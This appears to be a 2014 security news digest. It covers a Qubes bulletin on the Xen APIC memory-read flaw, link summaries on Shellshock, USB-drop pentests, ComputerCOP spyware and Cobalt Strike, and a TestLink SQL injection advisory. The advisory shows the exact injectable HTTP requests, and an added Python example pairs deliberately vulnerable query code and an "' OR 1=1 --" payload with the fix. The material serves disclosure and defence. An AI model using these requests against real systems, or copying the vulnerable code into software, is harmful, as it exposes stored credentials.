guest execution is interrupted (e.g. because of a trap). These registers 
might contain e.g. (parts of) keys or other secrets, if the guest was 
executing some sensitive crypto operation just before it got interrupted. 

The vulnerability allows reading only a few kB of the hypervisor memory,
with only relative addressing from the emulated APIC registers page,
whose address is not known to the attacker. Still, for exactly the
same systems (same binaries running, same ACPI tables, etc.) it's likely
that the attacker would be able to guess the address of the APIC page.
However, it is much less probable that she would be able to predict what
Xen structures are located in the adjacent memory, and much less still
that the attacker would be able to control which structures are located
there, as there do not seem to be many ways for a malicious HVM to
significantly affect the layout of the hypervisor heap (e.g. to force
arch_vcpu structures of interesting domains to appear nearby).

Nevertheless, it might happen, by pure coincidence, that an arch_vcpu 
structure with a content of an interesting VM will just happen to be 
located adjacently to the emulated APIC page. 

In that case, the next problem for the attacker would be lack of control 
and knowledge over the target VM execution: even if the attacker were 
somehow lucky to find the other VM's register-holding-structure adjacent 
to the APIC page, it would still be unclear what the target VM was 
executing at the time it was suspended and so, whether the registers 
stored in the structure are worthwhile or not. 

It is conceivable that the attacker might attempt to use some form of 
heuristic, such as "if RIP == X, then RAX likely contains (parts of) the 
important key", hoping that this specific RIP would signify a specific 
interesting instruction (e.g. part of some crypto library) being 
executed while the VM was interrupted, and so the key is to be found in 
one of the registers. 

But the attacker's memory-reading exploit doesn't offer the comfort of 
synchronization, so even if the attacker were so extremely lucky as to 
find that *(apic_page + guessed_offset_to_rip) == X (the attacker here 
assumes that 'guessed_offset_to_rip' is the distance between the APIC 
page and the address where RIP is stored in the presumed arch_vcpu 
structure that is presumably located adjacently), there is still no 
guarantee that the next read of *(apic_page + guessed_offset_to_rax) 
will return the content of RAX from the same moment at which RIP was 
snapshotted (and which the attacker considered interesting). 

Arguably the attacker might try to run the attack continuously, thus 
increasing the chances of success. Assuming this won't cause the system 
to crash due to accessing non-mapped memory, this might sound like a 
somewhat reasonable strategy. 

However, in the case of a desktop system like Qubes OS, the attacker has 
very limited control over other domains. Unlike when attacking a VM that 
plays the role of a Web server, for instance, the attacker probably 
won't be able to force the target VMs to do lots of repeated crypto 
operations, nor choose the moments when the target VM traps. 

Exploiting this bug in an IaaS scenario might be more practical, though, 
as there the attacker also has some control over domain 
creation/termination and so can affect the Xen heap to some extent. But 
on a system like Qubes OS, it seems unlikely. 

So, are we doomed? We likely are, but probably not because of this bug. 


Patching 
---------- 

The specific packages that resolve the problems mentioned 
in this bulletin have been uploaded to the current-testing repo: 

* Xen packages version 4.1.6.1-16 

The packages are to be installed in Dom0 via the qubes-dom0-update 
command or via the Qubes graphical manager. 

A system restart will be required afterwards. 

If you use Anti Evil Maid, you will need to reseal your secret 
passphrase to the new PCR values, as PCR14 will change because of the 
new xen.gz binary. 


References 
------------ 

[1] http://xenbits.xen.org/xsa/advisory-108.html 


Thanks, 
joanna. 

-- 
The Qubes Security Team 
http://wiki.qubes-os.org/trac/wiki/SecurityPage 

Same-Origin Policy Potential Issue of iOS UIWebView

I found a potential same-origin policy issue in the stringByEvaluatingJavaScriptFromString method of UIWebView. When you use this method in shouldStartLoadWithRequest with an HTTP redirect, JavaScript will be executed on the wrong domain.

more here.........http://harupuxa.blogspot.jp/2014/10/same-origin-policy-potential-issue-of.html

Thumb Drives.. Can you tell the difference?

During a physical penetration test, it is not uncommon for the tester (attacker) to drop USB thumb drives out in the parking lot or someplace within the building.  The hope is that an employee will pick it up and connect it to their computer.  The end goal: malware that makes a connection back to the attacker.

more here..........http://blog.secureideas.com/2014/10/thumb-drives-can-you-tell-difference.html

Apple Releases Patch for Shellshock, May Still Be Vulnerable

Yesterday, Apple released security updates that address two of the "Shellshock" bash vulnerabilities: CVE-2014-6271 and CVE-2014-7169. At the time of writing, the updates are not available using Software Update on OS X. Instead, users should download the package directly from Apple's web site to install it. Updates are available for 10.7 (Lion), 10.8 (Mountain Lion) and 10.9 (Mavericks).

Amidst the flurry of activity and interest around Shellshock over the last week, several additional bash vulnerabilities have come to light.

more here..........https://community.rapid7.com/community/infosec/blog/2014/09/30/apple-releases-patch-for-shellshock-may-still-be-vulnerable


ComputerCOP: The Dubious 'Internet Safety Software' That Hundreds of Police Agencies Have Distributed to Families

For years, local law enforcement agencies around the country have told parents that installing ComputerCOP software is the “first step” in protecting their children online.

Police chiefs, sheriffs, and district attorneys have handed out hundreds of thousands of copies of the disc to families for free at schools, libraries, and community events, usually as a part of an “Internet Safety” outreach initiative. The packaging typically features the agency’s official seal and the chief’s portrait, with a signed message warning of the “dark and dangerous off-ramps” of the Internet.

As official as it looks, ComputerCOP is actually just spyware.

more here...........https://www.eff.org/deeplinks/2014/09/computercop-dangerous-internet-safety-software-hundreds-police-agencies

CVE-2014-5308 - Multiple SQL Injection Vulnerabilities in TestLink

Vulnerability title: Multiple SQL Injection Vulnerabilities in TestLink
CVE: CVE-2014-5308
Vendor: Testlink
Product: TestLink
Affected version: 1.9.11
Fixed version: Fixed in SVN commit number 7a09973
Reported by: Jerzy Kramarz

Details:

Two SQL injection vulnerabilities have been found and confirmed within the software as an authenticated user. A successful attack could allow an authenticated attacker to access information such as usernames and password hashes that are stored in the database. The following URLs and parameters have been confirmed to suffer from SQL injection:

Vulnerability 1 (Fixed in commit #7a09973 in official repository)

<pre>

POST /testlink/lib/project/projectView.php?doAction=search HTTP/1.1
Host: 192.168.56.101
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.56.101/testlink/lib/project/projectEdit.php
Cookie: [...]
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 200

CSRFName=CSRFGuard_1740781925&CSRFToken=b16[...]&name=<SQL Injection>&search=Search%2FFilter

</pre>

Vulnerability 2 (Fixed in patches after commit #7a09973 in official repository)

<pre>

POST /testlink/lib/events/eventinfo.php HTTP/1.1
Content-Length: 6
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
Host: 192.168.56.101
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
DNT: 1
Connection: close
Referer: http://192.168.56.101/testlink/lib/events/eventviewer.php
Pragma: no-cache
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: [...] ys-edit_tc_tproject_id_1_ext-comp-1001=a%3As%253A/1; ys-tl_table_eventviewer={"columns":[{"id":1,"width":217,"hidden":true,"sortable":true}],"sort":{"field":"id_th_timestamp","direction":"DESC"},"group":"id_th_loglevel","filters":{}}

id=123<SQL Injection>

</pre>

Note: Any user can create an account for the application on the 'testlink/firstLogin.php' page, hence it is possible to exploit the aforementioned SQL injections without prior knowledge of any authentication details.

Further details at:

https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-5308/
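To show the weakness class behind both requests (a text search filter and a numeric id spliced into the SQL string) beside the parameterized form that closes it, here is an added Python/sqlite3 example; it is not TestLink's code, and the table names, columns and sample rows are constructed stand-ins:

```python
import sqlite3


def make_db():
    """Constructed stand-in tables; NOT TestLink's real schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE testprojects (id INTEGER, name TEXT, active INTEGER)")
    conn.executemany("INSERT INTO testprojects VALUES (?, ?, ?)",
                     [(1, "Alpha", 1), (2, "Beta", 1), (3, "Hidden", 0)])
    conn.execute("CREATE TABLE events (id INTEGER, message TEXT)")
    conn.executemany("INSERT INTO events VALUES (?, ?)",
                     [(1, "login ok"), (2, "admin password reset")])
    return conn


def search_projects_unsafe(conn, name):
    """Weakness class of the 'name' search filter: user text pasted into SQL."""
    sql = ("SELECT id, name FROM testprojects "
           "WHERE active = 1 AND name LIKE '%" + name + "%'")
    return conn.execute(sql).fetchall()


def search_projects_safe(conn, name):
    """Hardened form: the filter value travels as a bound parameter."""
    sql = "SELECT id, name FROM testprojects WHERE active = 1 AND name LIKE ?"
    return conn.execute(sql, ("%" + name + "%",)).fetchall()


def lookup_event_unsafe(conn, event_id):
    """Weakness class of the 'id' parameter: numeric-looking input pasted in."""
    sql = "SELECT id, message FROM events WHERE id = " + event_id
    return conn.execute(sql).fetchall()


def lookup_event_safe(conn, event_id):
    """Hardened form: enforce the integer type first, then bind the value."""
    if not event_id.isdigit():
        raise ValueError("event id must be a non-negative integer")
    sql = "SELECT id, message FROM events WHERE id = ?"
    return conn.execute(sql, (int(event_id),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    payload = "' OR 1=1 --"                      # constructed sample input
    print(search_projects_unsafe(db, payload))   # all rows, inactive one included
    print(search_projects_safe(db, payload))     # [] : treated as a literal name
    print(lookup_event_unsafe(db, "1 OR 1=1"))   # both events leak
    print(lookup_event_safe(db, "1"))            # [(1, 'login ok')]
```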


Copyright:
Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.

Disclaimer:
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.



User-driven Attacks

A user-driven attack is an attack that relies on a feature to get code execution. Most penetration testers I know rely on user-driven attacks over public memory corruption exploits. User-driven attacks are less likely to see a patch and they usually target an application in a way that works across many versions. What’s not to like?

Cobalt Strike offers several user-driven attacks. In this post, I’ll give you a quick tour of what’s available. These are my options to help you get a foothold.


more here.........http://blog.cobaltstrike.com/2014/10/01/user-driven-attacks/